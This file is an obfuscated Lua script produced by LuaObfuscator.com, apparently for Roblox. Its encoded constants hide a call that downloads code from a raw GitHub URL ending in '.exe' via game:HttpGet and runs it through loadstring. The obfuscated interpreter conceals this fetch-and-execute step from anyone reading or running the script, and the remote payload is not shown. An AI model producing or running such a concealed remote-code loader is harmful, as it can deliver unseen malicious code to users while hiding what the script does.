--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v122=0;local v123;while true do if (v122==1) then return v123;end if (v122==0) then v123=v5(v87,v19);v19=nil;v122=1;end end else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(1 + 0))))%((5 -3)^(((v33-(878 -(282 + 595))) -(v32-((118 -(32 + 85)) -(0 + 0)))) + ((1 + 1) -1))) ;return v88-(v88%(620 -(555 + 64))) ;else local v89=(2 -0)^(v32-(1066 -(68 + 997))) ;return (((v31%(v89 + v89))>=v89) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==1) then return (v37 * (606 -(87 + 193 + 70))) + v36 ;end if (v35==(957 -(892 + 65))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (182 -((164 -97) + 113)) ;v35=1 -0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + ((27 -12) -11) ;return (v41 * 16777216) + (v40 * ((48396 + 18092) -(802 + 150))) + (v39 * ((1686 -(915 + 82)) -433)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=2 -(1487 -(998 + 488)) ;local v45=(v20(v43,1 + 0 ,26 -6 ) * ((1189 -(1069 + 118))^(72 -40))) + v42 ;local v46=v20(v43,45 -24 ,2 + 4 + 25 );local v47=((v20(v43,56 -(20 + 4) )==(1 + 0)) and  -(792 -(368 + 423))) or 1 ;if (v46==0) then if (v45==(0 -0)) then return v47 * (18 -(10 + 8)) ;else v46=1;v44=0 -0 ;end elseif (v46==(2489 -(416 + 26))) then return ((v45==0) and (v47 * ((3 -2)/((772 -(201 + 571)) + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1809 -(1924 -(116 + 1022))) ) * (v44 + (v45/((440 -(145 + 293))^(482 -(44 + 386))))) ;end local function v25(v48) local v49;if  not v48 then local v90=0 -0 ;while true do if (v90==((0 + 0) -0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(860 -(288 + 526 + 45)) );v18=v18 + v48 ;local v50={};for v66=3 -2 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 + 0 ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91~= #"!") then else if (v92== #",") then v93=(function() return v94()~=0 ;end)();elseif (v92==2) then v93=(function() return v95();end)();elseif (v92~= #"asd") then else v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (0~=v91) then else local v116=(function() return 0;end)();local v117=(function() return;end)();while true do if (v116~=(0 + 0)) then else v117=(function() return 574 -(507 + 67) ;end)();while true do if (v117==0) then v92=(function() return v94();end)();v93=(function() return nil;end)();v117=(function() return 1;end)();end if (1~=v117) then else v91=(function() return  #"}";end)();break;end end break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101) local v102=(function() return 1749 -(1013 + 736) ;end)();local v103=(function() return;end)();while true do if (v102~=0) then else v103=(function() return 0;end)();while true do if (v103==(0 + 0)) then v99[v100-#"~" ]=(function() return v101();end)();return v99,v100,v101;end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #">",v57 do FlatIdent_31905,Type,Cons,v21,v24,v25,v58,v68=(function() return v51(FlatIdent_31905,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"-19"]=(function() return v21();end)();for v69= #"~",v23() do local v70=(function() return v21();end)();if (v20(v70, #"[", #",")~=(0 -0)) then else local v106=(function() return 867 -(550 + 317) ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if ((0 -0)==v106) then local v120=(function() return 0 -0 ;end)();local v121=(function() return;end)();while true do if (v120==0) then v121=(function() return 0 -0 ;end)();while true do if (v121~=(285 -(134 + 151))) then else v107=(function() return 0;end)();v108=(function() return nil;end)();v121=(function() return 1;end)();end if ((1666 -(970 + 695))~=v121) then else v106=(function() return 1;end)();break;end end break;end end end if (v106~=(3 -1)) then else while true do if ((1992 -(582 + 1408))==v107) then local v125=(function() return 0 -0 ;end)();local v126=(function() return;end)();while true do if (v125~=0) then else v126=(function() return 0;end)();while true do if (v126~=(1 -0)) then else v107=(function() return  #"19(";end)();break;end if (v126~=(0 -0)) then else if (v20(v109, #"[", #"{")== #"<") then v110[2]=(function() return v58[v110[2]];end)();end if (v20(v109,1826 -(1195 + 629) ,2)== #">") then v110[ #"-19"]=(function() return v58[v110[ #"19("]];end)();end v126=(function() return 1 -0 ;end)();end end break;end end end if (v107== #"-19") then if (v20(v109, #"xxx", #"xnx")~= #"{") then else v110[ #"0836"]=(function() return v58[v110[ #"?id="]];end)();end v53[v69]=(function() return v110;end)();break;end if (v107~=(241 -(187 + 54))) then else local v128=(function() return 0;end)();local v129=(function() return;end)();while true do if (v128==(780 -(162 + 618))) then v129=(function() return 0 + 0 ;end)();while true do if (v129==0) then v108=(function() return v20(v70,2, #"xnx");end)();v109=(function() return v20(v70, #"http",4 + 2 );end)();v129=(function() return 1 -0 ;end)();end if ((1 -0)==v129) then v107=(function() return  #"}";end)();break;end end break;end end end if (v107== #",") then local v130=(function() return 0 + 0 ;end)();local v131=(function() return;end)();while true do if (v130~=0) then else v131=(function() return 1636 -(1373 + 263) ;end)();while true do if (0~=v131) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 0;end)();while true do if (v177==0) then v110[ #"gha"]=(function() return v22();end)();v110[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v108== #"|") then v110[ #"xxx"]=(function() return v23();end)();elseif (v108==(2 -0)) then v110[ #"91("]=(function() return v23() -(2^16) ;end)();elseif (v108== #"-19") then local v182=(function() return 0 -0 ;end)();local v183=(function() return;end)();while true do if ((1384 -(746 + 638))==v182) then v183=(function() return 0;end)();while true do if (v183==0) then v110[ #"91("]=(function() return v23() -((1 + 1)^(23 -7)) ;end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v131=(function() return 1;end)();end if (v131~=(342 -(218 + 123))) then else v107=(function() return 2;end)();break;end end break;end end end end break;end if (v106~=1) then else v109=(function() return nil;end)();v110=(function() return nil;end)();v106=(function() return 1583 -(1535 + 46) ;end)();end end end end for v71= #" ",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[2 + 0 ];local v65=v60[1 + 2 ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=561 -(306 + 254) ;local v77= -(167 -(122 + 44));local v78={};local v79={...};local v80=v12("#",...) -(1 -0) ;local v81={};local v82={};for v104=1467 -(899 + 568) ,v80 do if ((v104>=v74) or (74>=143)) then v78[v104-v74 ]=v79[v104 + 1 + 0 ];else v82[v104]=v79[v104 + (2 -1) ];end end local v83=(v80-v74) + (604 -(268 + 335)) ;local v84;local v85;while true do local v105=290 -(60 + (397 -167)) ;while true do if (v105==(572 -(426 + 146))) then v84=v72[v76];v85=v84[1 + 0 ];v105=1457 -(282 + 1174) ;end if ((18<2112) and (v105==((2693 -1881) -(569 + 242)))) then if (v85<=3) then if (v85<=(2 -1)) then if ((1097<=1628) and (v85>0)) then local v133=v84[1 + 1 ];local v134=v82[v84[3]];v82[v133 + (1025 -(706 + 318)) ]=v134;v82[v133]=v134[v84[1255 -(721 + 530) ]];else v82[v84[2]]=v62[v84[1274 -(945 + 326) ]];end elseif (v85==(4 -(2 + 0))) then do return;end else local v140;local v141,v142;local v143;local v144;v82[v84[1 + 1 + 0 ]]=v62[v84[703 -(271 + 429) ]];v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[3 -1 ]]=v62[v84[3]];v76=v76 + (66 -(30 + 35)) ;v84=v72[v76];v144=v84[1502 -(1408 + 92) ];v143=v82[v84[1089 -(461 + 625) ]];v82[v144 + (1289 -(993 + 295)) ]=v143;v82[v144]=v143[v84[1 + 3 ]];v76=v76 + (1172 -(418 + 753)) ;v84=v72[v76];v82[v84[1 + 1 ]]=v84[1 + 2 ];v76=v76 + 1 + 0 ;v84=v72[v76];v144=v84[2];v141,v142=v75(v82[v144](v13(v82,v144 + 1 ,v84[1 + 2 ])));v77=(v142 + v144) -(530 -(406 + 85 + 38)) ;v140=0;for v166=v144,v77 do v140=v140 + (1770 -(1749 + 20)) ;v82[v166]=v141[v140];end v76=v76 + 1 + 0 ;v84=v72[v76];v144=v84[2];v82[v144]=v82[v144](v13(v82,v144 + (1323 -(1249 + 73)) ,v77));v76=v76 + (1258 -(1043 + 214)) + 0 ;v84=v72[v76];v82[v84[1147 -(466 + 679) ]]();v76=v76 + 1 ;v84=v72[v76];do return;end end elseif ((4630==4630) and (v85<=(11 -6))) then if ((3540>2683) and (v85>(11 -7))) then local v158=0;local v159;while true do if (v158==((7183 -5283) -(106 + 1794))) then v159=v84[2];v82[v159]=v82[v159](v13(v82,v159 + (1213 -(323 + 889)) ,v77));break;end end else v82[v84[1 + (2 -1) ]]=v84[1 + 2 ];end elseif ((4794>=3275) and (v85>(17 -11))) then local v162=v84[5 -3 ];local v163,v164=v75(v82[v162](v13(v82,v162 + 1 ,v84[117 -(4 + 110) ])));v77=(v164 + v162) -(585 -(57 + 527)) ;local v165=(2007 -(361 + 219)) -((361 -(53 + 267)) + 1386) ;for v169=v162,v77 do v165=v165 + (104 -(17 + 86)) ;v82[v169]=v163[v165];end else v82[v84[2 + 0 ]]();end v76=v76 + (1 -0) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034C3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F696C6F766578656E6F6E2F6D61696E2F726566732F68656164732F6D61696E2F7865736F6E7A2E65786500083Q0012033Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
